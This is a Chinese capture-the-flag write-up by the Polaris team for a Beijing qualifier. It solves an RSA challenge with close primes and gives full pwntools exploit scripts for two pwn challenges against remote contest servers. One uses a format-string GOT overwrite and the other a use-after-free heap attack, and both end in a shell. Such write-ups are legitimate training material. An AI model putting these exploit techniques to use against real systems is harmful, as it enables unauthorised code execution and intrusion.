中国工业互联网安全大赛北京市预选赛-Polaris战队 WP

WriteUp 2年前 (2022) admin

755 0 0

本次比赛我们打进决赛,为参赛师傅们点赞! 中国工业互联网安全大赛北京市预选赛-Polaris战队 WP

期待参赛师傅们线下精彩的表现。

本次成绩

中国工业互联网安全大赛北京市预选赛-Polaris战队 WP

Crypto

cry1

爆破获得p q 实现解密

from gmpy2 import *from random import *import libnum
from z3 import *
e = 101684733522589049376051051576215902510166244234370429058800153902445053536138419222096346715560283781778705047246555278271919928248836576236044123786248907522717751222608113597458768397652361813688176017155353220911686089871315647328303370846954697334521948003485878793121446614220897034652783771882675756065n = 106490064297459077911162044548396107234298314288687868971249318200714506925762583340058042587392504450330878677254698499363515259785914237880057943786202091010532603853142050802310895234445611880617572636397946757345480447391544962796834842717321639098108976593541239044249391398321435940436125823407760564233c = 92367575354201067679929326801477992215675304496512806779109227230237905402825022908214026985431756172011616861246881703226244396008088878308925377019775353026444957454196182919500667632574210469783704454438904889268692709062013797002819384105191802781841741128273810101308641357704215204494382259638905571144
# for b in range(2000):#     print(b)#     S = Solver()#     p = Int('p')#     q = Int('q')#     S.add(p*q==n)#     S.add(q-p==2**420+b)#     tmp = str(S.check())#     print(tmp)#     if tmp == 'sat':#         print(S.model())#         break
p = 10319402322686090423885467952714173652268828534546477197386930749224489548928953868783557378771133014491657222761298355394963285810795152496594136510185639q = 10319402322686090423885467950006488404103970273239432095684700570087343967507257994593635913327166893587725950261323349433889479075061548042098460895952847
phi = (p-1)*(q-1)d = int(gmpy2.invert(e,phi))m = int(pow(c,d,n))print(libnum.n2s(m))
# m = bytes_to_long(flag)
# while True:#     try:#         p = getPrime(512)#         q = next_prime(p+2**420)#         n = p*q#         phi = (p-1)*(q-1)#         d = randint(0,n**0.32)#         e = inverse(d,phi)#         c = pow(m,e,n)#         break#     except:#         continue
# print("e = %d"%e)# print("n = %d"%n)# print("c = %d"%c)
'''e = 101684733522589049376051051576215902510166244234370429058800153902445053536138419222096346715560283781778705047246555278271919928248836576236044123786248907522717751222608113597458768397652361813688176017155353220911686089871315647328303370846954697334521948003485878793121446614220897034652783771882675756065n = 106490064297459077911162044548396107234298314288687868971249318200714506925762583340058042587392504450330878677254698499363515259785914237880057943786202091010532603853142050802310895234445611880617572636397946757345480447391544962796834842717321639098108976593541239044249391398321435940436125823407760564233c = 92367575354201067679929326801477992215675304496512806779109227230237905402825022908214026985431756172011616861246881703226244396008088878308925377019775353026444957454196182919500667632574210469783704454438904889268692709062013797002819384105191802781841741128273810101308641357704215204494382259638905571144'''

flag值：

flag{24ceb9bc-08a5-4ba8-8ef5-231dcb049c0f}

PWN

究极输出

通过格式化字符串泄露libc基址，修改printf的git表为system，实现getshell

bss段格式化字符串漏洞。

我们首先动态调试，发现可以通过“%9$p”来泄露libc地址

中国工业互联网安全大赛北京市预选赛-Polaris战队 WP

泄露之后，算出基地址。然后利用，这两条链子来在栈中写入got的地址got+2的地址：

中国工业互联网安全大赛北京市预选赛-Polaris战队 WP

写入之后：

中国工业互联网安全大赛北京市预选赛-Polaris战队 WP

再次利用格式化字符串，修改got表的信息为system函数即可：

中国工业互联网安全大赛北京市预选赛-Polaris战队 WP

等输入和输出结束手动输入sh，即可获得shell，然后再输入cat flag即可。

bss段格式化字符串，找两条链子，打printf的got表为system,然后手动输入sh，即可获得shell。
```PYTHONfrom pwn import *# r = process('./pwn1')r = remote("39.105.99.40",16018)e = ELF('./pwn1')libc = e.libccontext.terminal = ['tmux', 'splitw', '-h']context.log_level = 'debug'
se      = lambda data               :r.send(data) sa      = lambda delim,data         :r.sendafter(delim, data)sl      = lambda data               :r.sendline(data)sla     = lambda delim,data         :r.sendlineafter(delim, data)sea     = lambda delim,data         :r.sendafter(delim, data)rc      = lambda numb=4096          :r.recv(numb)rl      = lambda                    :r.recvline()ru      = lambda delims          :r.recvuntil(delims)uu32    = lambda data               :u32(ru(data)[-4:].ljust(4, b''))uu64    = lambda data               :u64(ru(data)[-6:].ljust(8, b''))info_base = lambda tag, base        :r.info(tag + ': {:#x}'.format(base))leak = lambda name,base :log.success('{} = {:#x}'.format(name, base))
def dbg(cmd):  gdb.attach(r,cmd)
ru(b'HELLO?PWN IT!!!n')sl(b"%9$p")
got = 0x403390
og = [0x45226,0x4527a,0xf03a4,0xf1247]libc_base  = int(rc(14),16)-0x20840leak("libc_base",libc_base)sys = libc_base + libc.sym['system']offest1 = sys & 0xffff offest3 = sys & 0xffffffoffest2 = int(offest3/0x10000)shell = libc_base + og[0]pl1 = '%13200c%6$hn%4194306c%17$n' sl(pl1.encode())
leak('sys',sys)leak("shell",shell)#36 8ru(b'HELLO?PWN IT!!!n')pl2 = "%" + "{}c".format(offest2) + "%36$hhn"pl2 += "%" + "{}c".format(offest1-offest2) + "%8$hn"sl(pl2.encode())
# dbg('')
r.interactive()```

10 humidCtr

通过同时rand绕过伪随机数，通过UAF实现getshell

```#!/usr/bin/python3# -*- coding:utf-8 -*-
from pwn import *import os, struct, random, time, sys, signal, ctypes
dll = ctypes.CDLL('libc.so.6')dll.srand(dll.time())
class Shell():    def __init__(self):        self.clear(arch='amd64', os='linux', log_level='debug')        # self.pipe = process(['./pwn'])        self.pipe = remote('47.95.8.59', 29767)        def send(self, data:bytes, **params): return self.pipe.send(data, **params)    def sendline(self, data:bytes, **params): return self.pipe.sendline(data, **params)    def recv(self, **params): return self.pipe.recv(**params)    def close(self, **params): return self.pipe.close(**params)    def recvrepeat(self, timeout, **params): return self.pipe.recvrepeat(timeout, **params)    def interactive(self, **params): return self.pipe.interactive(**params)    def clear(self, **params): return context.clear(**params)
    def recvn(self, numb, **params):         result = self.pipe.recvn(numb, **params)        if(len(result) != numb):            raise EOFError('recvn')        return result
    def recvuntil(self, delims, **params):        result = self.pipe.recvuntil(delims, drop=False, **params)        if(not result.endswith(delims)):            raise EOFError('recvuntil')        return result[:-len(delims)]
    def sendafter(self, delim, data, **params):        self.recvuntil(delim, **params)        self.send(data, **params)
    def sendlineafter(self, delim, data, **params):        self.recvuntil(delim, **params)        self.sendline(data, **params)
    def add(self, index, size, content):        self.send(b'POST / HTTP/1.1rn' + p8(1) + b'&' + str(index).encode() + b'&' + str(size).encode() + b'&' + content)        def delete(self, index):        self.send(b'POST / HTTP/1.1rn' + p8(4) + b'&' + str(index).encode())
    def show(self, index):        self.send(b'POST / HTTP/1.1rn' + p8(3) + b'&' + str(index).encode())
    def edit(self, index, content):        self.send(b'POST / HTTP/1.1rn' + p8(2) + b'&' + str(index).encode() + b'&' + content)


sh = Shell()sh.send(b'DEV / HTTP/1.1rn' + p32(dll.rand()) + b'auth')time.sleep(1)sh.add(0, 0x26, b'a')time.sleep(1)sh.show(0)sh.recvuntil(b'The Humide Script 0 is set as ')libc_addr = u64(sh.recvn(6) + b'') - 0x1ecb61success('libc_addr: ' + hex(libc_addr))time.sleep(1)sh.add(1, 0x18, b'a')time.sleep(1)sh.add(2, 0x18, b'a')time.sleep(1)sh.add(0x10, 0x18, b'a')time.sleep(1)sh.delete(2)time.sleep(1)sh.delete(1)time.sleep(1)sh.edit(0, b'a' * 0x20 + p64(libc_addr + 0x1eee48))time.sleep(1)sh.add(2, 0x18, b'/bin/sh')time.sleep(1)sh.add(3, 0x18, p64(libc_addr + 0x52290))time.sleep(1)sh.delete(2)sh.interactive()